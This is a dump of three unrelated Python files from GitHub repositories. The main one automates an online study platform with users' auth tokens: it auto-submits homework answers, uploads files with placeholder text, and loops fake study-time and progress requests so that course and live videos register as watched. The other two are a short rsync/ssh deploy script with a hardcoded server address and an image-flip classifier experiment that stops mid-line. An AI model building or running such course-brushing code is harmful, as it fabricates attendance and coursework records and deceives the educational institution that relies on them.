params_items['answer_directory_path'] # 答案目录\n self.answer_succeed_json = params_items['answer_succeed_json']\n self.username = self.account_items['username'] # 该取值无误\n self.common_headers = Headers.CommonHeaders.value\n self.common_headers['authorization'] = self.account_items['token']\n self.file_upload_headers = Headers.FileUploadHeaders.value\n self.file_upload_headers['authorization'] = self.account_items['token']\n self.common_function = CommonFunction(self.qt_gui) # 创建公共函数对象\n self.request_service = RequestService(self.username, self.common_function) # 创建请求类对象\n self.answer_parse = AnswerResponseParse(params_items, self.common_function) # 创建响应解析类\n\n def course_list_search_request(self, log_print=None):\n # 请求 科目接口,查询子作业的信息和参数\n course_params_list = list()\n log_content = self.common_function.get_log_item(one=self.username) # 获取日志信息\n url = AnswerPathAndUploadUrl.items.value['url']['courseListSearchUrl']\n params = {'data': {}, 'parameter_mode': 'json', 'headers': self.common_headers}\n request_result = self.request_service.request(url=url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n response = request_result['response']\n if response.json()['code'] != 'REQ001' and 'processList' not in response.json()['data']:\n log_content['content'] = f\"{self.username} courseListSearch 数据响应不一致 缺失REQ001 or data!\\n\"\n log_content['loggerItem']['four'] = f\"courseListSearch 数据响应不一致 缺失REQ001 or data!\"\n self.common_function.logger_print(log_content, log_print)\n return course_params_list\n else:\n log_content['content'] = f\"{self.username} courseListSearch 连续请求不成功\\n\"\n log_content['loggerItem']['four'] = f\"courseListSearch 连续请求不成功!\"\n self.common_function.logger_print(log_content, log_print)\n return course_params_list\n return self.answer_parse.course_search_response_parse(response, log_print) # 调用解析响应函数\n\n def homework_list_search_request(self, course_item, log_print=None):\n # 根据科目id等信息,请求子作业的接口,存储子作业的参数信息\n homework_param_list = list()\n url = AnswerPathAndUploadUrl.items.value['url']['homeworkListSearchUrl']\n course_title = course_item['courseTitle']\n course_resource_id = course_item['courseResourceId']\n file_prefix = f\"{self.answer_directory_path}/{course_title}\"\n log_content = self.common_function.get_log_item(one=self.username, two=course_title) # 获取日志信息\n # 本地对应目录的答案文件列表\n answer_file_list = [os.path.splitext(path)[0].split('-')[-1] for path in os.listdir(file_prefix)]\n form_data = {'courseResourceId': course_resource_id}\n params = {'data': form_data, 'parameter_mode': 'json', 'headers': self.common_headers}\n request_result = self.request_service.request(url=url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n response = request_result['response']\n if response.json()['code'] != 'REQ001' and 'recordList' not in response.json()['data']:\n log_content['content'] = f\"{self.username} homeworkListSearch 数据响应不一致 缺失REQ001 or data!\\n\"\n log_content['loggerItem']['four'] = f\"homeworkListSearch 数据响应不一致 缺失REQ001 or data!\"\n self.common_function.logger_print(log_content, log_print)\n return homework_param_list\n else:\n log_content['content'] = f\"{self.username} homeworkListSearch 连续请求不成功!\\n\"\n log_content['loggerItem']['four'] = f\"homeworkListSearch 连续请求不成功!\"\n self.common_function.logger_print(log_content, log_print)\n return homework_param_list\n return self.answer_parse.homework_search_response_parse(response, course_item, answer_file_list, log_print)\n\n def online_homework_answer_search(self, homework_request_param, task_name):\n # 搜索单选题、多选题、判断题��填充题 的答案\n course_title = homework_request_param['courseTitle']\n if homework_request_param['score'] is not None and homework_request_param['score'] > 80:\n content = f\"{self.username} {course_title} {task_name} 线上作业已完成 {homework_request_param['score']}\"\n log_content = self.common_function.get_log_item(content=content, one=self.username, two=course_title,\n three=task_name, four='线上作业已完成', five=f\"成绩:{homework_request_param['score']}\"\n )\n self.common_function.logger_print(log_content)\n return TaskReturnMessage.OnlineHomeWorkFinished.value # score不为None 并且大于80分\n start_url = AnswerPathAndUploadUrl.items.value[task_name]['startUrl']\n start_params = {\n 'id': homework_request_param['examId'], 'subjectId': homework_request_param['subjectId'],\n 'taskId': homework_request_param['taskId']\n }\n params = {'data': start_params, 'parameter_mode': 'json', 'headers': self.common_headers}\n request_result = self.request_service.request(url=start_url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n start_response = request_result['response']\n else:\n return TaskReturnMessage.QuestionAnswerSearchRequestFailing.value\n if 'answer' not in start_response.json()['data']['groups'][0]['questions'][0]:\n time.sleep(1.5)\n request_result = self.request_service.request(url=start_url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n start_response = request_result['response']\n if start_response.json()['code'] != 'REQ001' or start_response.json()['msg'] != \"请求成功\":\n return TaskReturnMessage.QuestionAnswerSearchDataLost.value\n elif 'data' not in start_response.json() or 'groups' not in start_response.json()['data']:\n return TaskReturnMessage.QuestionAnswerSearchDataLost.value\n elif 'questions' not in start_response.json()['data']['groups'][0]:\n return TaskReturnMessage.QuestionAnswerSearchDataLost.value\n else:\n return TaskReturnMessage.QuestionAnswerSearchRequestFailing.value\n return self.answer_parse.online_question_answer_search_response_parse(homework_request_param, start_response)\n\n def online_homework_submit_answer(self, homework_request_param, answer, task_name):\n \"\"\" 线上作业 子问题 提交答案 \"\"\"\n course_title = homework_request_param['courseTitle']\n sequence = answer['sequence']\n update_url = AnswerPathAndUploadUrl.items.value[task_name]['updateUrl']\n params = {'data': answer, 'parameter_mode': 'json', 'headers': self.common_headers}\n request_result = self.request_service.request(url=update_url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n update_response = request_result['response']\n content = f\"{self.username} {course_title} {task_name} 第{sequence}题 - {update_response.json()['msg']}\\n\"\n log_content = self.common_function.get_log_item(content=content, one=self.username,\n two=course_title, three=task_name, four=update_response.json()['msg'], five=f\"第{sequence}题\"\n )\n self.common_function.logger_print(log_content)\n if update_response.json()['code'] != 'REQ001':\n return {'taskStatus': False, 'msg': update_response.json()['msg']}\n else:\n content = f\"{self.username} {course_title} {task_name} 第{sequence}题 - 连续请求不成功\\n\"\n log_content = self.common_function.get_log_item(content=content, one=self.username,\n two=course_title, three=task_name, four='连续请求不成功', five=f\"第{sequence}题\"\n )\n self.common_function.logger_print(log_content)\n return TaskReturnMessage.ChildHomeWorkFailing.value\n return TaskReturnMessage.ChildHomeWorkSuccess.value\n\n def online_homework_all_submit_answer(self, homework_request_param, submit_form_data, task_name):\n \"\"\"线上作业 总提交 答案 \"\"\"\n course_title = homework_request_param['courseTitle']\n submit_url = AnswerPathAndUploadUrl.items.value[task_name]['submitUrl']\n params = {'data': submit_form_data, 'parameter_mode': 'json', 'headers': self.common_headers}\n request_result = self.request_service.request(url=submit_url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n submit_response = request_result['response']\n content = f\"{self.username} {course_title} {task_name} - {submit_response.json()['msg']}\\n\"\n log_content = self.common_function.get_log_item(content=content, one=self.username,\n two=course_title, three=task_name, four=submit_response.json()['msg'], five='选择题总提交'\n )\n self.common_function.logger_print(log_content)\n if submit_response.json()['code'] == 'REQ001':\n return TaskReturnMessage.LastOnlineHomeWorkSuccess.value\n return {'taskStatus': False, 'msg': submit_response.json()['msg']}\n else:\n content = f\"{self.username} {course_title} {task_name} - 连续请求不成功\\n\"\n log_content = self.common_function.get_log_item(content=content, one=self.username,\n two=course_title, three=task_name, four='连续请求不成功', five='选择题总提交'\n )\n self.common_function.logger_print(log_content)\n return TaskReturnMessage.LastOnlineHomeWorkFailing.value\n\n def img_text_info_find_search(self, homework_request_param, task_name):\n # 查询该作业是否需要上传图片、填充文字;\n info_url = AnswerPathAndUploadUrl.items.value['url']['infoUrl']\n task_id = homework_request_param['taskId']\n course_title = homework_request_param['courseTitle']\n params = {'data': {'taskId': task_id}, 'parameter_mode': 'json', 'headers': self.common_headers}\n request_result = self.request_service.request(url=info_url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n info_response = request_result['response']\n content = f\"{self.username} - {course_title} {task_name} infoFind {info_response.json()['msg']}\\n\"\n log_content = self.common_function.get_log_item(content=content, one=self.username,\n two=course_title, three=task_name, four=info_response.json()['msg'], five='图片、文字填充-查询阶段'\n )\n self.common_function.logger_print(log_content)\n if info_response.json()['code'] != 'REQ001':\n return TaskReturnMessage.ImgTextFindFailingDetail.value\n else:\n content = f\"{self.username} - {course_title} {task_name} infoFind 图片、文字填充-连续请求不成功!\\n\"\n log_content = self.common_function.get_log_item(content=content, one=self.username,\n two=course_title, three=task_name, four='查询失败-连续请求不成功', five='图片、文字填充-查询阶段'\n )\n self.common_function.logger_print(log_content)\n return TaskReturnMessage.ImgTextFindFailing.value\n return self.answer_parse.img_text_info_find_response_parse(info_response)\n\n def file_upload_homework_submit(self, homework_request_param, file_path, task_name):\n # 上传 pdf、图片、word\n course_title = homework_request_param['courseTitle']\n file_exists_result = self.common_function.file_exists(self.username, course_title, task_name, file_path)\n if file_exists_result['taskStatus'] is False:\n return file_exists_result\n upload_url = AnswerPathAndUploadUrl.items.value['url']['uploadUrl']\n multipart_encoder = MultipartEncoder(fields={\n 'file': (file_path, open(file_path, 'rb'), 'application/octet-stream')\n })\n self.file_upload_headers['Content-Type'] = multipart_encoder.content_type\n params = {'data': multipart_encoder, 'parameter_mode': 'data', 'headers': self.file_upload_headers}\n request_result = self.request_service.request(url=upload_url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n upload_response = request_result['response']\n content = f\"{self.username} {course_title} {task_name} {file_path} {upload_response.json()['msg']} 文件上传\\n\"\n log_content = self.common_function.get_log_item(content=content, one=self.username, two=course_title,\n three=task_name, four=upload_response.json()['msg'], five=f\"文件上传阶段:{file_path}\"\n )\n self.common_function.logger_print(log_content)\n if upload_response.json()['code'] == 'REQ001' or upload_response.json()['msg'] == '请求成功':\n task_result = TaskReturnMessage.FileUploadSuccess.value\n task_result['msg'] += f' {file_path}'\n task_result[\"fileIds\"] = upload_response.json()['data']['id']\n return task_result\n return {'taskStatus': False, 'msg': f\"{upload_response.json()['msg']} {file_path}\"}\n else:\n content = f\"{self.username} - {task_name} {file_path} 文件上传失败 - 连续请求不成功\\n\"\n log_content = self.common_function.get_log_item(content=content, one=self.username, two=course_title,\n three=task_name, four='文件上传失败', five=f\"文件上传失败-连续请求不成功:{file_path}\"\n )\n self.common_function.logger_print(log_content)\n task_result = TaskReturnMessage.FileUploadFailing.value\n task_result['msg'] += f' {file_path}'\n return task_result\n\n def last_text_homework_submit(self, homework_request_param, student_file_ids, task_name):\n # pdf,img,word,文字 提交\n answer_url = AnswerPathAndUploadUrl.items.value['url']['answerUrl']\n course_title = homework_request_param['courseTitle']\n task_id = homework_request_param['taskId']\n text_params = {\n 'answer': \"1\", 'answerText': \"

1

\", 'fileIds': [], 'studentFileIds': [student_file_ids],\n 'taskId': task_id, 'version': 'null'\n }\n params = {'data': text_params, 'parameter_mode': 'json', 'headers': self.common_headers}\n request_result = self.request_service.request(url=answer_url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n text_response = request_result['response']\n content = f\"{self.username} {course_title} {task_name} {text_response.json()['msg']} 文本填充\"\n log_content = self.common_function.get_log_item(content=content, one=self.username, two=course_title,\n three=task_name, four=text_response.json()['msg'], five='总提交-文本填充'\n )\n self.common_function.logger_print(log_content)\n if text_response.json()['code'] == 'REQ001':\n return TaskReturnMessage.LastTextUploadSuccess.value\n return {'taskStatus': False, 'msg': f'总提交失败-文本填充阶段 {text_response.json()[\"msg\"]}'}\n else:\n content = f\"{self.username} {course_title} {task_name} 总提交-文本填充失败 连续请求不成功\\n\"\n log_content = self.common_function.get_log_item(content=content, one=self.username, two=course_title,\n three=task_name, four='总提交-文本填充失败', five='连续请求不成功'\n )\n self.common_function.logger_print(log_content)\n return TaskReturnMessage.LastTextUploadFailing.value\n\n def last_file_homework_submit(self, homework_request_param, file_ids, student_file_ids, task_name):\n # pdf,img,word 提交\n answer_url = AnswerPathAndUploadUrl.items.value['url']['answerUrl']\n task_id = homework_request_param['taskId']\n course_title = homework_request_param['courseTitle']\n submit_params = {\n 'answer': \"\", 'answerText': \"\", 'fileIds': file_ids, 'studentFileIds': [student_file_ids],\n 'taskId': task_id, 'version': 'null'\n }\n params = {'data': submit_params, 'parameter_mode': 'json', 'headers': self.common_headers}\n request_result = self.request_service.request(url=answer_url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n submit_response = request_result['response']\n content = f\"{self.username} {course_title} {task_name} {submit_response.json()['msg']} 总提交-文件上传\"\n log_content = self.common_function.get_log_item(content=content, one=self.username, two=course_title,\n three=task_name, four=submit_response.json()['msg'], five='总提交-文件上传'\n )\n self.common_function.logger_print(log_content)\n if submit_response.json()['code'] == 'REQ001':\n return TaskReturnMessage.LastFileUploadSuccess.value\n return {'taskStatus': False, 'msg': f'总提交-文件上传失败 {submit_response.json()[\"msg\"]}'}\n else:\n content = f\"{self.username} {course_title} {task_name} 总提交-文本填充失败 连续请求不成功\\n\"\n log_content = self.common_function.get_log_item(content=content, one=self.username, two=course_title,\n three=task_name, four='总提交-文件上传失败', five='连续请求不成功'\n )\n self.common_function.logger_print(log_content)\n return TaskReturnMessage.LastFileUploadFailing.value\n\n\nclass OnlineInfoFindTaskRequest(object):\n def __init__(self, token_items, qt_gui, common_function):\n self.qt_gui = qt_gui\n self.username = token_items['username']\n self.common_function = common_function\n self.common_headers = Headers.CommonHeaders.value\n self.common_headers['authorization'] = token_items['token']\n self.request_service = RequestService(self.username, self.common_function) # 创建请求类对象\n\n def online_answer_info_request(self, homework_param, route_key, log_print=None):\n \"\"\" 根据传入的作业详情进行数据比较,判断该作业的完成情况\n :return 作业完成情况\n \"\"\"\n course_title = homework_param['courseTitle']\n task_name = route_key\n score = homework_param['score']\n homework_status = '未完成' if score is None or score <= 0 else '已完成'\n log_content = self.common_function.get_log_item(one=self.username, two=course_title, three=task_name,\n four=homework_status, five=f\"成绩详情:{score}\"\n )\n self.common_function.logger_print(log_content, log_print)\n return {\"taskStatus\": True if homework_status == '已完成' else False, 'homework_status': homework_status}\n\n def upload_answer_info_request(self, homework_param, log_print=None):\n \"\"\" 账户文件上传答题的详细信息情况\n :return 作业完成情况\n \"\"\"\n url = AnswerPathAndUploadUrl.info_find_items.value['answerSuccessUrl']\n course_title = homework_param['courseTitle']\n task_name = homework_param['taskName']\n log_content = self.common_function.get_log_item(one=self.username, two=course_title, three=task_name) # 获取日志信息\n task_id = homework_param['taskId']\n params = {'data': {'taskId': task_id}, 'parameter_mode': 'json', 'headers': self.common_headers}\n request_result = self.request_service.request(url=url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n upload_answer_response = request_result['response']\n if upload_answer_response.json()['code'] == 'REQ001' and \"请求成功\" in upload_answer_response.json()['msg']:\n # 此处\"answerFileList\" is None 表示该账户对应的作业上传情况为空\n homework_status = '未完成' if upload_answer_response.json()['data']['answerFileList'] is None else '已完成'\n else:\n homework_status = '请求失败'\n return {\"taskStatus\": False, 'homework_status': homework_status}\n msg = f\"线上答题信息查询 {upload_answer_response.json()['msg']}\"\n log_content['content'] = f'{self.username} {course_title} {task_name} {homework_status} {msg}'\n log_content['loggerItem']['four'] = homework_status\n log_content['loggerItem']['five'] = msg\n self.common_function.logger_print(log_content, log_print)\n return {\"taskStatus\": True if homework_status == '已完成' else False, 'homework_status': homework_status}\n else:\n log_content['content'] = f\"{self.username} {course_title} {task_name} 线上答题信息查询 连续请求不成功\\n\"\n log_content['loggerItem']['four'] = f\"连续请求不成功\"\n log_content['loggerItem']['five'] = f\"线上答题信息查询!\"\n self.common_function.logger_print(log_content, log_print)\n return {\"taskStatus\": False, 'homework_status': '线上答题信息查询 连续请求不成功'}\n\n\nclass BrushClassTaskRequest(object):\n def __init__(self, log_print, qt_gui=None, common_function=None):\n self.log_print = log_print\n self.brush_class_parse = BrushClassResponseParse(self.log_print) # 创建解析类对象\n self.add_progress_url = BrushClassUrl.items.value['add_progress']\n self.add_time_url = BrushClassUrl.items.value['add_time']\n\n def course_info_search_request(self, items):\n \"\"\" 请求主修科目接口,对响应进行判断,将正确的响应传入course_info_search_parse解析函数\n :return 课程title,课程资源id list\n \"\"\"\n course_info_list = []\n account_item = items['account_item']\n username = account_item['username']\n headers = Headers.CommonHeaders.value\n headers['authorization'] = account_item['token'] # 组建请求头信息\n params = {'data': {}, 'parameter_mode': 'json', 'headers': headers}\n request_service = RequestService(username, items['common_function']) # 创建请求类对象\n url = BrushClassUrl.items.value['course_list']\n request_result = request_service.request(url=url, method='POST', time_sleep=1.5, items=params)\n log_content = items['common_function'].get_log_item(one=username, five='主修科目搜索 阶段')\n content = '请求成功'\n if request_result['status'] is True and request_result['response'].json():\n course_list_response = request_result['response']\n status = course_list_response.json()['code']\n if status == 'REQ001' and 'processList' in course_list_response.json()['data']:\n course_info_list = self.brush_class_parse.course_info_search_parse(items, course_list_response)\n return course_info_list\n else:\n content = 'course_info_search_request 数据响应不一致 缺失REQ001 or data'\n else:\n content = 'course_info_search_request 连续请求不成功'\n log_content['content'] = f'{username} {content}'\n log_content['loggerItem']['four'] = content\n items['common_function'].logger_print(log_content, self.log_print)\n return course_info_list\n\n def course_video_info_search_request(self, object_items, param_items):\n \"\"\" 课程视频接口请求,并将正确的响应,传入解析函数中\n :return 课程视频id、标题、视频总时长、视频当前时长 list\n \"\"\"\n course_video_list = list()\n username = object_items['account_item']['username']\n course_resource_id = param_items['course_resource_id']\n major_title = param_items['major_title']\n object_items['major_title'] = major_title # 存储主修科目名称至 类方法对象中\n headers = Headers.CommonHeaders.value\n headers['authorization'] = object_items['account_item']['token'] # 组建请求头信息\n params = {'parameter_mode': 'json', 'headers': headers, 'data': {'courseResourceId': course_resource_id}}\n url = BrushClassUrl.items.value['course_video_info']\n request_service = RequestService(username, object_items['common_function']) # 创建请求类对象\n request_result = request_service.request(url=url, method='POST', time_sleep=1.5, items=params)\n log_content = object_items['common_function'].get_log_item(one=username, two=major_title, five='视频信息搜索 阶段')\n content = '课程 请求成功'\n if request_result['status'] is True and request_result['response'].json():\n video_list_response = request_result['response']\n if video_list_response.json()['code'] == 'REQ001' and '请求成功' in video_list_response.json()['msg']:\n course_video_list = self.brush_class_parse.course_video_info_parse(object_items, video_list_response)\n else:\n content = 'course_video_info_search_request 课程 数据响应不一致 缺失REQ001 or data'\n else:\n content = 'video_info_search_request 课程 连续请求不成功'\n log_content['content'] = f'{username} {content}'\n log_content['loggerItem']['three'] = \"课程 全部检索完成\"\n log_content['loggerItem']['four'] = content\n object_items['common_function'].logger_print(log_content, self.log_print)\n return course_video_list\n\n def live_video_info_search_request(self, object_items, param_items):\n \"\"\" 直播视频、接口请求,将正确的响应传入解析函数\n :return 直播标题、总时长、当前时长、科目名称 list\n \"\"\"\n live_video_list = []\n username = object_items['account_item']['username']\n course_resource_id = param_items['course_resource_id']\n major_title = param_items['major_title']\n object_items['major_title'] = major_title # 存储主修科目名称至 类方法对象中\n headers = Headers.CommonHeaders.value\n headers['authorization'] = object_items['account_item']['token'] # 组建请求头信息\n params = {'parameter_mode': 'json', 'headers': headers, 'data': {'id': course_resource_id}}\n url = BrushClassUrl.items.value['live_video_info']\n request_service = RequestService(username, object_items['common_function']) # 创建请求类对象\n request_result = request_service.request(url=url, method='POST', time_sleep=1.5, items=params)\n log_content = object_items['common_function'].get_log_item(one=username, two=major_title, five='视频信息搜索 阶段')\n content = '直播 请求成功'\n if request_result['status'] is True and request_result['response'].json():\n video_list_response = request_result['response']\n if video_list_response.json()['code'] == 'REQ001' and '请求成功' in video_list_response.json()['msg']:\n live_video_list = self.brush_class_parse.live_video_info_parse(object_items, video_list_response)\n else:\n content = 'live_video_info_search_request 直播 数据响应不一致 缺失REQ001 or data'\n else:\n content = 'video_info_search_request 直播 连续请求不成功'\n log_content['content'] = f'{username} {content}'\n log_content['loggerItem']['three'] = \"直播 全部检索完成\"\n log_content['loggerItem']['four'] = content\n return live_video_list\n\n def course_video_param_add_progress_request(self, param_items, object_items):\n seconds = 10\n username = object_items['account_item']['username']\n course_now_time = param_items['course_now_time']\n request_total = int(param_items['course_total_time'] / 10) + 1 - int(course_now_time / 10)\n last_study_time = course_now_time\n video_id = param_items['videoId']\n headers = Headers.CommonHeaders.value\n headers['authorization'] = object_items['account_item']['token'] # 组建请求头信息\n request_service = RequestService(username, object_items['common_function']) # 创建请求类对象\n log_content = object_items['common_function'].get_log_item(one=username, two=param_items['major_title'],\n three=param_items['course_title'], five='课程视频 进度条添加阶段')\n for i in range(request_total):\n last_study_time += seconds\n form_data = {'lastStudyTime': last_study_time, 'videoId': video_id}\n params = {'data': form_data, 'parameter_mode': 'json', 'headers': headers}\n request_service.request(url=self.add_progress_url, method='POST', time_sleep=1.5, items=params)\n local_create_time = int((time.time() + seconds) * 1000)\n form_data = {\n 'appType': '3', 'charterSectionId': param_items['charterSectionId'], 'lastStudyTime': last_study_time,\n 'localCreateTime': local_create_time, 'studyTime': '10', 'uploadType': '1', 'videoId': video_id,\n 'videoType': '1'\n }\n params = {'data': form_data, 'parameter_mode': 'json', 'headers': headers}\n request_result = request_service.request(url=self.add_time_url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n add_response = request_result['response']\n if add_response.json()['code'] == 'REQ001' and '请求成功' in add_response.json()['msg']:\n content = f\"{param_items['video_name']} 添加成功 {i + 1}/{request_total}\"\n else:\n content = f\"{param_items['video_name']} 添加失败 {i + 1}/{request_total} 数据响应不一致 缺失REQ001\"\n else:\n content = f'{param_items[\"video_name\"]} 添加失败 {i + 1}/{request_total} 连续请求不成功'\n log_content['content'] = f'{username} {content}'\n log_content['loggerItem']['four'] = content\n object_items['common_function'].logger_print(log_content, self.log_print)\n content = f'观看完成 --------------------------- {request_total}/{request_total}'\n log_content['content'] = f'{username} {content}'\n log_content['loggerItem']['four'] = content\n object_items['common_function'].logger_print(log_content, self.log_print)\n return log_content['loggerItem']\n\n def live_video_add_progress_request(self, param_items, object_items):\n seconds = 10\n username = object_items['account_item']['username']\n live_now_time = param_items['live_now_time']\n request_total = int(param_items['live_total_time'] / 10) + 1 - int(live_now_time / 10)\n last_study_time = live_now_time\n headers = Headers.CommonHeaders.value\n headers['authorization'] = object_items['account_item']['token'] # 组建请求头信息\n request_service = RequestService(username, object_items['common_function']) # 创建请求类对象\n log_content = object_items['common_function'].get_log_item(one=username, two=param_items['major_title'],\n three=param_items['live_title'], five='直播视频 进度条添加阶段')\n for i in range(request_total):\n last_study_time += seconds\n form_data = {'lastStudyTime': last_study_time, 'videoId': param_items['videoId']}\n params = {'data': form_data, 'parameter_mode': 'json', 'headers': headers}\n request_service.request(url=self.add_progress_url, method='POST', time_sleep=1.5, items=params)\n local_create_time = int((time.time() + seconds) * 1000)\n form_data = {\n 'appType': '3', 'lastStudyTime': last_study_time, 'localCreateTime': local_create_time,\n 'studyTime': '10', 'uploadType': '1', 'videoId': param_items['videoId']\n }\n params = {'parameter_mode': 'json', 'headers': headers, 'data': form_data}\n request_result = request_service.request(url=self.add_time_url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n add_response = request_result['response']\n if add_response.json()['code'] == 'REQ001' and '请求成功' in add_response.json()['msg']:\n content = f\"{param_items['video_title']} 添加成功 {i + 1}/{request_total}\"\n else:\n content = f\"{param_items['video_title']} 添加失败 {i + 1}/{request_total} 数据响应不一致 缺失REQ001\"\n else:\n content = f'{param_items[\"video_title\"]} 添加失败 {i + 1}/{request_total} 连续请求不成功'\n log_content['content'] = f'{username} {content}'\n log_content['loggerItem']['four'] = content\n object_items['common_function'].logger_print(log_content, self.log_print)\n content = f'观看完成 --------------------------- {request_total}/{request_total}'\n log_content['content'] = f'{username} {content}'\n log_content['loggerItem']['four'] = content\n object_items['common_function'].logger_print(log_content, self.log_print)\n return log_content['loggerItem']\n","repo_name":"Exixiaozhou/YkStudyAnswer","sub_path":"MyLib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":42269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70365639845","text":"#!/usr/bin/env python3\n\nimport subprocess as sp\nfrom typing import Optional, List\n\n\nclass Rsync(object):\n def __init__(self, source_dir:str, target_dir: str):\n self.server_user_name = \"lsu1\"\n self.server_ip = \"139.224.58.222\"\n self.source_dir = source_dir\n self.target_dir = target_dir\n\n def rsync(self,\n exclude: Optional[List[str]],\n dry_run: Optional[bool]=False):\n # Rsync files\n exclude = ' '.join([f'--exclude={ele}' for ele in exclude])\n cmd = f'rsync -avhi{\"n\" if dry_run else \"\"} --progress --delete {exclude} \\\n {self.source_dir} {self.server_user_name}@{self.server_ip}:{self.target_dir}'\n print(cmd)\n sp.run(cmd, shell=True, check=True)\n\n\nclass Git(object):\n def __init__(self):\n self.server_user_name = \"lsu1\"\n self.server_ip = \"139.224.58.222\"\n\n def git_status_remote(self, target_dir: str):\n cmd = f'ssh {self.server_user_name}@{self.server_ip} \"cd {target_dir}; git status\"'\n sp.run(cmd, shell=True, check=True)\n\n\nrsync = Rsync(source_dir=\"../Novel-Molecular-Toxicity-Prediction-Model/\", target_dir=\"/home/Novel-Molecular-Toxicity-Prediction-Model/\")\nrsync.rsync(exclude=['.git', 'model'], dry_run=False)\n\ngit = Git()\ngit.git_status_remote(target_dir=\"/home/Novel-Molecular-Toxicity-Prediction-Model/\")\n# rsync -avhi --progress --delete --exclude=\".git\" multi-turn-dialogue-ir/ lsu1@139.224.58.222:/home/UtteranceRewriter/\n","repo_name":"jerrylsu/Novel-Molecular-Toxicity-Prediction-Model","sub_path":"rsync.py","file_name":"rsync.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"2191805217","text":"import importlib.util, os\nspec = importlib.util.spec_from_file_location(\"link_libs\", os.environ['LIB_SCRIPT'])\nlink_libs = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(link_libs)\n\n\nimport h5py\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom sklearn.metrics import roc_auc_score, roc_curve\nimport matplotlib.pyplot as plt\n\n\n# quick test of sensitivity to flipped images in the encodings\n\n\n# Form flipped images\n# =====================================================\n\niso_file = \"data/imagenet/imagenet_iso224.h5\"\nout_file = \"ssddata/imagenet/imagenet_iso224_flip.h5\"\n\niso_h5 = h5py.File(iso_file, 'r')\ncats = [c for c in iso_h5.keys() if not c.endswith('_y')]\n# cats = ['bathtub', 'bakery', 'artichoke']\n\nwith h5py.File(out_file, 'w') as out_h5:\n for cat in cats:\n print(f\"Category: {cat}\")\n nimg = iso_h5[cat + '_y'][...].sum()\n to_flip = iso_h5[cat][...][iso_h5[cat + '_y'][...].astype('bool')]\n dset_img = out_h5.create_dataset(cat, to_flip.shape, iso_h5[cat].dtype)\n dset_img[...] = to_flip[:, ::-1, :, :]\n dset_y = out_h5.create_dataset(cat + '_y', (nimg,), np.bool_)\n dset_y[...] = True\n\n\n\n\n# Train logstic regressions on fliped and upright imgages\n# =====================================================\n\nflip_encodings = \"ssddata/apool/enc_ign_iso112_flip.h5\" # flip_detection.md\nuprt_encodings = \"ssddata/apool/enc_ign_iso112.h5\" # flip_detection.md\nreg_performance_plot = \"plots/runs/flip/reg_performance_112.pdf\"\nraw_weight_out = 'data/models/opposed_regs_ign112_flip.npz'\nreg_out = 'data/models/regs_ign112_flip.npz'\nlayer = '0.4.3'\nn_trn_each = 400\nn_val_each = 200\n\nflip_h5 = h5py.File(flip_encodings, 'r')\nuprt_h5 = h5py.File(uprt_encodings, 'r')\n\nopposing_weights = {'cats': cats}\ncombined_regs = {}\nweight_corrs = {}\nval_aucs = {}\ncombo_auc = {}\nwith PdfPages(reg_performance_plot) as pdf:\n for i_cat, cat in enumerate(cats):\n\n uprt_y = uprt_h5['y'][i_cat].astype('bool')\n trn_uprt_feat = uprt_h5[layer][i_cat][...][uprt_y][:n_trn_each]\n val_uprt_feat = uprt_h5[layer][i_cat][...][uprt_y][n_trn_each:n_trn_each + n_val_each]\n\n trn_flip_feat = flip_h5[layer][i_cat, :n_trn_each]\n val_flip_feat = flip_h5[layer][i_cat, n_trn_each:n_trn_each + n_val_each]\n\n all_trn_feat = np.hstack([trn_uprt_feat, trn_flip_feat]\n ).reshape((n_trn_each*2,) + trn_uprt_feat.shape[1:]\n ).mean(axis = (2, 3))\n val_feat = np.hstack([val_uprt_feat, val_flip_feat]\n ).reshape((n_val_each*2,) + val_uprt_feat.shape[1:]\n ).mean(axis = (2, 3))\n trn_isuprt = np.array([1, 0] * n_trn_each).astype('bool')\n val_isuprt = np.array([1, 0] * n_val_each).astype('bool')\n\n trn_ix = np.arange(n_trn_each * 2) < n_trn_each\n\n fig, ax = plt.subplots(1, 4, figsize = (10, 3), sharey = True)\n for j, (cond, trn_x, val_x, trn_y, val_y) in enumerate([\n ('uprt', all_trn_feat[ trn_ix], val_feat, trn_isuprt[ trn_ix], val_isuprt),\n ('flip', all_trn_feat[~trn_ix], val_feat, ~trn_isuprt[~trn_ix], ~val_isuprt)]):\n reg = LogisticRegression(\n solver = 'liblinear',\n max_iter = 1000,\n fit_intercept = False)\n reg.fit(trn_x, trn_y)\n trn_fn = (reg.coef_ * trn_x).sum(axis = 1)\n val_fn = (reg.coef_ * val_x).sum(axis = 1)\n opposing_weights[f'{cat}:{cond}'] = reg.coef_\n\n for i, (fn, y, ttl) in enumerate([\n (trn_fn, trn_y, 'Train'),\n (val_fn, val_y, 'Val')]):\n ax[2*j + i].plot(\n np.random.uniform(-0.1, 0.1, y.sum()), fn[y],\n 'C0o', ms = 5, alpha = 0.5)\n ax[2*j + i].plot(\n np.random.uniform(0.9, 1.1, (~y).sum()), fn[~y],\n 'C3o', ms = 5, alpha = 0.5)\n ax[2*j + 